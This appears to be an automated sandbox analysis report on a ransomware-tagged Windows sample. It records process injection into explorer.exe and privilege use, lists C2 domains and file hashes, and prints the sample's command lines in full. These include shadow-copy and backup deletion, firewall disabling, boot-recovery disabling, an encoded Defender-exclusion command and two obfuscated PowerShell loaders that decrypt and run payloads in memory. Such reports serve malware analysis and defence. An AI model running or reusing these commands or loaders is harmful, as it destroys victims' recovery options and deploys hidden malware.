N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\D5D3.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\E4D8.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1960 wrote to memory of 3656 N/A C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138.exe C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138.exe
PID 1960 wrote to memory of 3656 N/A C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138.exe C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138.exe
PID 1960 wrote to memory of 3656 N/A C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138.exe C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138.exe
PID 1960 wrote to memory of 3656 N/A C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138.exe C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138.exe
PID 1960 wrote to memory of 3656 N/A C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138.exe C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138.exe
PID 1960 wrote to memory of 3656 N/A C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138.exe C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138.exe
PID 2636 wrote to memory of 4200 N/A N/A C:\Users\Admin\AppData\Local\Temp\D5D3.exe
PID 2636 wrote to memory of 4200 N/A N/A C:\Users\Admin\AppData\Local\Temp\D5D3.exe
PID 2636 wrote to memory of 1168 N/A N/A C:\Users\Admin\AppData\Local\Temp\E4D8.exe
PID 2636 wrote to memory of 1168 N/A N/A C:\Users\Admin\AppData\Local\Temp\E4D8.exe
PID 2636 wrote to memory of 1168 N/A N/A C:\Users\Admin\AppData\Local\Temp\E4D8.exe
PID 2636 wrote to memory of 1816 N/A N/A C:\Users\Admin\AppData\Local\Temp\E834.exe
PID 2636 wrote to memory of 1816 N/A N/A C:\Users\Admin\AppData\Local\Temp\E834.exe
PID 2636 wrote to memory of 1816 N/A N/A C:\Users\Admin\AppData\Local\Temp\E834.exe
PID 2636 wrote to memory of 4480 N/A N/A C:\Users\Admin\AppData\Local\Temp\EA96.exe
PID 2636 wrote to memory of 4480 N/A N/A C:\Users\Admin\AppData\Local\Temp\EA96.exe
PID 2636 wrote to memory of 4480 N/A N/A C:\Users\Admin\AppData\Local\Temp\EA96.exe
PID 2636 wrote to memory of 2424 N/A N/A C:\Users\Admin\AppData\Local\Temp\ED76.exe
PID 2636 wrote to memory of 2424 N/A N/A C:\Users\Admin\AppData\Local\Temp\ED76.exe
PID 2636 wrote to memory of 2424 N/A N/A C:\Users\Admin\AppData\Local\Temp\ED76.exe
PID 2636 wrote to memory of 4552 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 2636 wrote to memory of 4552 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 2636 wrote to memory of 4552 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 2636 wrote to memory of 4552 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 1816 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\E834.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1816 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\E834.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1816 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\E834.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2636 wrote to memory of 1668 N/A N/A C:\Windows\explorer.exe
PID 2636 wrote to memory of 1668 N/A N/A C:\Windows\explorer.exe
PID 2636 wrote to memory of 1668 N/A N/A C:\Windows\explorer.exe
PID 2636 wrote to memory of 452 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 2636 wrote to memory of 452 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 2636 wrote to memory of 452 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 2636 wrote to memory of 452 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 2636 wrote to memory of 1164 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 2636 wrote to memory of 1164 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 2636 wrote to memory of 1164 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 2636 wrote to memory of 1164 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 2636 wrote to memory of 2324 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 2636 wrote to memory of 2324 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 2636 wrote to memory of 2324 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 2636 wrote to memory of 2324 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 2636 wrote to memory of 2056 N/A N/A C:\Windows\explorer.exe
PID 2636 wrote to memory of 2056 N/A N/A C:\Windows\explorer.exe
PID 2636 wrote to memory of 2056 N/A N/A C:\Windows\explorer.exe
PID 2636 wrote to memory of 1248 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 2636 wrote to memory of 1248 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 2636 wrote to memory of 1248 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 2636 wrote to memory of 1248 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 4480 wrote to memory of 1204 N/A C:\Users\Admin\AppData\Local\Temp\EA96.exe C:\Windows\system32\cmd.exe
PID 4480 wrote to memory of 1204 N/A C:\Users\Admin\AppData\Local\Temp\EA96.exe C:\Windows\system32\cmd.exe
PID 4480 wrote to memory of 4548 N/A C:\Users\Admin\AppData\Local\Temp\EA96.exe C:\Windows\system32\cmd.exe
PID 4480 wrote to memory of 4548 N/A C:\Users\Admin\AppData\Local\Temp\EA96.exe C:\Windows\system32\cmd.exe
PID 2636 wrote to memory of 4476 N/A N/A C:\Windows\explorer.exe
PID 2636 wrote to memory of 4476 N/A N/A C:\Windows\explorer.exe
PID 2636 wrote to memory of 4476 N/A N/A C:\Windows\explorer.exe
PID 2636 wrote to memory of 1036 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 2636 wrote to memory of 1036 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 2636 wrote to memory of 1036 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 2636 wrote to memory of 1036 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 4548 wrote to memory of 4376 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 4548 wrote to memory of 4376 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1204 wrote to memory of 4680 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1204 wrote to memory of 4680 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138.exe

"C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138.exe"

C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138.exe

"C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138.exe"

C:\Users\Admin\AppData\Local\Temp\D5D3.exe

C:\Users\Admin\AppData\Local\Temp\D5D3.exe

C:\Users\Admin\AppData\Local\Temp\E4D8.exe

C:\Users\Admin\AppData\Local\Temp\E4D8.exe

C:\Users\Admin\AppData\Local\Temp\E834.exe

C:\Users\Admin\AppData\Local\Temp\E834.exe

C:\Users\Admin\AppData\Local\Temp\EA96.exe

C:\Users\Admin\AppData\Local\Temp\EA96.exe

C:\Users\Admin\AppData\Local\Temp\ED76.exe

C:\Users\Admin\AppData\Local\Temp\ED76.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Users\Admin\AppData\Local\Temp\EA96.exe

"C:\Users\Admin\AppData\Local\Temp\EA96.exe"

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4812 -ip 4812

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4812 -s 216

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\vssadmin.exe

vssadmin delete shadows /all /quiet

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=disable

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled no

C:\Windows\system32\wbadmin.exe

wbadmin delete catalog -quiet

C:\Windows\system32\wbengine.exe

"C:\Windows\system32\wbengine.exe"

C:\Windows\System32\vdsldr.exe

C:\Windows\System32\vdsldr.exe -Embedding

C:\Windows\System32\vds.exe

C:\Windows\System32\vds.exe

C:\Users\Admin\AppData\Local\Temp\E4D8.exe

"C:\Users\Admin\AppData\Local\Temp\E4D8.exe"

C:\Users\Admin\AppData\Local\Temp\E4D8.exe

"C:\Users\Admin\AppData\Local\Temp\E4D8.exe"

C:\Users\Admin\AppData\Local\Temp\E4D8.exe

"C:\Users\Admin\AppData\Local\Temp\E4D8.exe"

C:\Users\Admin\AppData\Local\Temp\E4D8.exe

"C:\Users\Admin\AppData\Local\Temp\E4D8.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SRD.bat" "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sv.bat" "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\SRD.bat"

C:\Users\Admin\AppData\Local\Temp\SRD.bat.exe

"C:\Users\Admin\AppData\Local\Temp\SRD.bat.exe" -w hidden -c $RwDC='InVBDevokVBDeeVBDe'.Replace('VBDe', '');$IGVN='CreVBDeatVBDeeDecVBDeryptVBDeorVBDe'.Replace('VBDe', '');$qKLC='LoaVBDedVBDe'.Replace('VBDe', '');$fwfx='TVBDeranVBDesfVBDeorVBDemVBDeFinVBDeaVBDelVBDeBlVBDeocVBDekVBDe'.Replace('VBDe', '');$QupE='FrVBDeoVBDemBaVBDese6VBDe4StVBDeriVBDengVBDe'.Replace('VBDe', '');$GEjb='ChVBDeangVBDeeEVBDextVBDeenVBDesionVBDe'.Replace('VBDe', '');$XbqZ='ReaVBDedLiVBDenesVBDe'.Replace('VBDe', '');$dNNl='ElVBDeemeVBDentVBDeAtVBDe'.Replace('VBDe', '');$niMU='EVBDentVBDeryPVBDeoinVBDetVBDe'.Replace('VBDe', '');$CXFs='GetCVBDeurVBDereVBDenVBDetPVBDerocVBDeessVBDe'.Replace('VBDe', '');$tMEM='SplVBDeitVBDe'.Replace('VBDe', '');$yGFh='MaVBDeinVBDeModVBDeulVBDeeVBDe'.Replace('VBDe', '');function RcHQK($SJfnN){$ePbJG=[System.Security.Cryptography.Aes]::Create();$ePbJG.Mode=[System.Security.Cryptography.CipherMode]::CBC;$ePbJG.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$ePbJG.Key=[System.Convert]::$QupE('JDkzO6XH5gH021W2Y/ObVS2k+/ofiQdjxBF86RM/vL8=');$ePbJG.IV=[System.Convert]::$QupE('TPQFXcwHNdZ9KljZbDDnEA==');$uQtJU=$ePbJG.$IGVN();$QRiSY=$uQtJU.$fwfx($SJfnN,0,$SJfnN.Length);$uQtJU.Dispose();$ePbJG.Dispose();$QRiSY;}function nTqSF($SJfnN){$vKyUA=New-Object System.IO.MemoryStream(,$SJfnN);$flWoW=New-Object System.IO.MemoryStream;$gLlPI=New-Object System.IO.Compression.GZipStream($vKyUA,[IO.Compression.CompressionMode]::Decompress);$gLlPI.CopyTo($flWoW);$gLlPI.Dispose();$vKyUA.Dispose();$flWoW.Dispose();$flWoW.ToArray();}$fsXoM=[System.Linq.Enumerable]::$dNNl([System.IO.File]::$XbqZ([System.IO.Path]::$GEjb([System.Diagnostics.Process]::$CXFs().$yGFh.FileName, $null)), 1);$JMYTy=$fsXoM.Substring(2).$tMEM(':');$fhNaK=nTqSF (RcHQK ([Convert]::$QupE($JMYTy[0])));$Prmhn=nTqSF (RcHQK ([Convert]::$QupE($JMYTy[1])));[System.Reflection.Assembly]::$qKLC([byte[]]$Prmhn).$niMU.$RwDC($null,$null);[System.Reflection.Assembly]::$qKLC([byte[]]$fhNaK).$niMU.$RwDC($null,$null);

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\sv.bat"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAA==

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

C:\Windows\Microsoft.NET/Framework/v4.0.30319/aspnet_compiler.exe

C:\Users\Admin\AppData\Local\Temp\sv.bat.exe

"C:\Users\Admin\AppData\Local\Temp\sv.bat.exe" -w hidden -c $QmQC='ElwQysewQysmwQysentwQysAwQystwQys'.Replace('wQys', '');$Cvyq='LowQysadwQys'.Replace('wQys', '');$Abka='GetwQysCurwQysrenwQystwQysProwQyscewQyssswQys'.Replace('wQys', '');$kkEJ='CrwQyseawQystewQysDewQyscrwQysyptwQysorwQys'.Replace('wQys', '');$uvnc='FrwQysomwQysBaswQyse64wQysStrwQysinwQysgwQys'.Replace('wQys', '');$oAYO='EwQysnwQystryPwQysowQysinwQystwQys'.Replace('wQys', '');$eVXi='ChawQysnwQysgewQysExwQystenwQyssiwQysowQysnwQys'.Replace('wQys', '');$KwUx='MwQysainwQysMowQysdwQysulwQysewQys'.Replace('wQys', '');$Nyws='InvowQyskewQys'.Replace('wQys', '');$JsiC='RwQyseadwQysLiwQysnewQysswQys'.Replace('wQys', '');$xxaz='SwQyspwQysliwQystwQys'.Replace('wQys', '');$OtLn='TrawQysnsfwQysormwQysFinwQysalwQysBlocwQyskwQys'.Replace('wQys', '');function coZUI($OpQVj){$aZVET=[System.Security.Cryptography.Aes]::Create();$aZVET.Mode=[System.Security.Cryptography.CipherMode]::CBC;$aZVET.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$aZVET.Key=[System.Convert]::$uvnc('iQPIhpce7ki6o+IHmlOhdoHm7HC8khIfOxAgdAkNw7A=');$aZVET.IV=[System.Convert]::$uvnc('NkX2UOU09KDD8//UYPJBsg==');$RGpCI=$aZVET.$kkEJ();$aARwL=$RGpCI.$OtLn($OpQVj,0,$OpQVj.Length);$RGpCI.Dispose();$aZVET.Dispose();$aARwL;}function fvMWD($OpQVj){$EEpkF=New-Object System.IO.MemoryStream(,$OpQVj);$pDChj=New-Object System.IO.MemoryStream;$BBOEV=New-Object System.IO.Compression.GZipStream($EEpkF,[IO.Compression.CompressionMode]::Decompress);$BBOEV.CopyTo($pDChj);$BBOEV.Dispose();$EEpkF.Dispose();$pDChj.Dispose();$pDChj.ToArray();}$YoalJ=[System.Linq.Enumerable]::$QmQC([System.IO.File]::$JsiC([System.IO.Path]::$eVXi([System.Diagnostics.Process]::$Abka().$KwUx.FileName, $null)), 1);$ZnOcq=$YoalJ.Substring(2).$xxaz(':');$njBYj=fvMWD (coZUI ([Convert]::$uvnc($ZnOcq[0])));$BkieQ=fvMWD (coZUI ([Convert]::$uvnc($ZnOcq[1])));[System.Reflection.Assembly]::$Cvyq([byte[]]$BkieQ).$oAYO.$Nyws($null,$null);[System.Reflection.Assembly]::$Cvyq([byte[]]$njBYj).$oAYO.$Nyws($null,$null);

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\SRD')

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(4312);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;

C:\Users\Admin\AppData\Local\FallbackBuffer\tzvkgtxv\PublicKey.exe

C:\Users\Admin\AppData\Local\FallbackBuffer\tzvkgtxv\PublicKey.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\sv')

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(5996);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;

Network

Country Destination Domain Proto
US 209.197.3.8:80 tcp
US 8.8.8.8:53 47.125.24.20.in-addr.arpa udp
US 8.8.8.8:53 serverlogs37.xyz udp
US 8.8.8.8:53 servblog757.xyz udp
DE 45.89.127.159:80 servblog757.xyz tcp
IT 179.43.162.58:80 179.43.162.58 tcp
NL 145.14.157.71:80 145.14.157.71 tcp
US 8.8.8.8:53 159.127.89.45.in-addr.arpa udp
US 8.8.8.8:53 58.162.43.179.in-addr.arpa udp
US 8.8.8.8:53 71.157.14.145.in-addr.arpa udp
US 8.8.8.8:53 septrex45.xyz udp
EE 159.253.18.136:80 septrex45.xyz tcp
US 8.8.8.8:53 136.18.253.159.in-addr.arpa udp
DE 45.89.127.159:80 servblog757.xyz tcp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
RU 91.215.85.210:42902 91.215.85.210 tcp
US 8.8.8.8:53 210.85.215.91.in-addr.arpa udp
US 209.197.3.8:80 tcp
US 209.197.3.8:80 tcp
US 8.8.8.8:53 62.13.109.52.in-addr.arpa udp
US 8.8.8.8:53 1.208.79.178.in-addr.arpa udp
GB 96.16.110.41:443 tcp
US 8.8.8.8:53 dexstat255.xyz udp
DE 185.234.72.142:46578 dexstat255.xyz tcp
US 8.8.8.8:53 142.72.234.185.in-addr.arpa udp

Files

memory/1960-133-0x0000000002520000-0x0000000002535000-memory.dmp

memory/3656-134-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1960-135-0x0000000002540000-0x0000000002549000-memory.dmp

memory/3656-136-0x0000000000400000-0x0000000000409000-memory.dmp

memory/3656-138-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2636-137-0x00000000014D0000-0x00000000014E6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\D5D3.exe

MD5 4ee88295d65b7a6e566d200a1c842801
SHA1 5dfb320e933425cea8188f8f7dab346796c3b090
SHA256 b93b9b4b0168407f63a6c2c16a96e4a4b41d5d715bdb9f46254a214570ba1b6b
SHA512 caab773590efe1cab87d209057bb557d52034b522c3fa47e4fb88b792418928cc0eb9a9d45c3c9131bd4af90153d8c44fae0040b04dec484e317ab4c44c7a6c4

C:\Users\Admin\AppData\Local\Temp\D5D3.exe

MD5 4ee88295d65b7a6e566d200a1c842801
SHA1 5dfb320e933425cea8188f8f7dab346796c3b090
SHA256 b93b9b4b0168407f63a6c2c16a96e4a4b41d5d715bdb9f46254a214570ba1b6b
SHA512 caab773590efe1cab87d209057bb557d52034b522c3fa47e4fb88b792418928cc0eb9a9d45c3c9131bd4af90153d8c44fae0040b04dec484e317ab4c44c7a6c4

memory/4200-152-0x000001F014450000-0x000001F0145BA000-memory.dmp

memory/4200-153-0x000001F02EBD0000-0x000001F02EBE0000-memory.dmp

memory/4200-154-0x000001F02EA10000-0x000001F02EB46000-memory.dmp

memory/4200-155-0x000001F02EA10000-0x000001F02EB46000-memory.dmp

memory/4200-157-0x000001F02EA10000-0x000001F02EB46000-memory.dmp

memory/4200-161-0x000001F02EA10000-0x000001F02EB46000-memory.dmp

memory/4200-159-0x000001F02EA10000-0x000001F02EB46000-memory.dmp

memory/4200-163-0x000001F02EA10000-0x000001F02EB46000-memory.dmp

